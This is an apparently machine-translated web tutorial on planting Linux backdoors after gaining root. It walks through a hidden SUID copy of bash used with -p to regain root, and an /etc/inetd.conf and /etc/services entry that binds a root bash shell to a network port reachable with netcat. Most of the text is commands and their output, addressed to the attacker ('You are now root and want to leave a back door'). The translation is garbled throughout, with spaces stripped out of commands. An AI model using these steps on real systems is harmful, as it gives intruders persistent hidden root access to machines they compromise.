The detailed explanation of CentOS carefully used by suid shell and inetd back door

Time:2020-2-18

You are now root and want to leave a back door.

CentOS小心被suid shell与inetd后门利用的详细讲解

System environment:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

First, switch to root and execute the following command:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

Of course, you can also have other more hidden names. I think you are lewd and witty, and you will surely come up with many good names. The point in front of the file is not necessary, just to hide the file (add “.” at the top of the file name, you can hide it in any file directory)

Now, as a normal user, let’s enable the backdoor:

[email protected]:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)[email protected]:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

Why not?

Because Bash2 has some protective measures for suid, but this is not unbreakable:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

Use the – P parameter to get a rootshell. This euid means effective userid (you can stamp here for knowledge about these IDS)

In particular, when executing this suid shell as an ordinary user, you must use the full path.

Little knowledge:

How to find files with suid:

dawg:~#find/-perm+4000-ls

The file with the suid bit will be returned.

2. Remote back door: Use / etc / inetd.conf

We use VI to modify the / etc / inetd.conf file

Original document:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

Revised to:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

Enable inetd:

dawg:~#inetd

To force a restart of inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

Now we can use NC to explode chrysanthemum:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

Tips:

We can modify the / etc / services file and add the following:

woot6666/tcp#evilbackdoorservice

Then modify / etc / inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

We can modify it to some common ports to hide.

Xiaobian’s speech: in fact, under the / etc / shadow file, the password of root is the most secure!